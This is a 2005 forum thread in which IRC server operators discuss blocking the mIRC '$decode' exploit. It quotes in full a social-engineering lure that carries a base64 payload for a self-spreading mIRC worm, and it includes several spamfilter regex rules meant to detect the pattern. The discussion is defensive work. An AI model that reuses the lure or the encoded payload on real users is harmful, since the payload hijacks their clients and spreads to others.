Page 1 of 1

decode exploit

Posted: Thu Sep 08, 2005 12:16 pm
by droolin
We received a decode exploit pm yesterday, and I thought it was covered.
The message was
<noxchi_rose> Want to be an OPERATOR in #mircpopup-magic ? copy/paste this-> //write   $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,
What I think was set up in the spamfilter.conf to catch this which is commented out is the following:

Code: Select all

/*
spamfilter {
        regex "//write \$decode\(.+\|.+load -rs";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
*/
Would this work???

Code: Select all

spamfilter {
        regex "//write \$decode\(.+";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
Any help on this would be greatly appriceated

droolin

Posted: Thu Sep 08, 2005 4:21 pm
by DeadNotBuried
it looks to me like they added an extra space before the $decode to get around the spamfilters.

i'd suggest using ".*//write +\$decode\(.+" as the regex as it will get any number of spaces in there, or for the truly paranoid ".*\$decode.*"

thank you, very much appriceated

Posted: Thu Sep 08, 2005 4:41 pm
by droolin
God, I really am blind. I did not see the extra space at all.
Appriceate the help.

droolin

Posted: Fri Sep 09, 2005 4:49 am
by aquanight
Also, you need to double the \ used in spamfilters in the config file (not those in /spamfilter).

Personally, I'd just use this:

Code: Select all

spamfilter {
    word "\\$decode";
    target "pcnNPqat";
    reason "Just use /dcc ...";
    action block;
};
There's about nothing I can think of that I'd use $decode rather than /dcc.

I did think about that

Posted: Fri Sep 09, 2005 12:14 pm
by droolin
I was thinking, who would use the $decode in a normal conversation.
We have some scripters, but basicatly I don't see them using the decode for anything.
The only thing I was worried about was when people were kicking scripting ideas around, on how to best do something.
And possibly getting caught then.
If we keep having problems though, thats what I'll end up doing. Solves the problem once and for all.

Thank you, very much appriceated.

droolin

Posted: Sat Sep 10, 2005 10:24 pm
by Jason
Why are we trying to escape the $ in $decode? It has no meaning except as the last character.

Posted: Sat Sep 10, 2005 10:30 pm
by aquanight
Because I'm paranoid like that? :P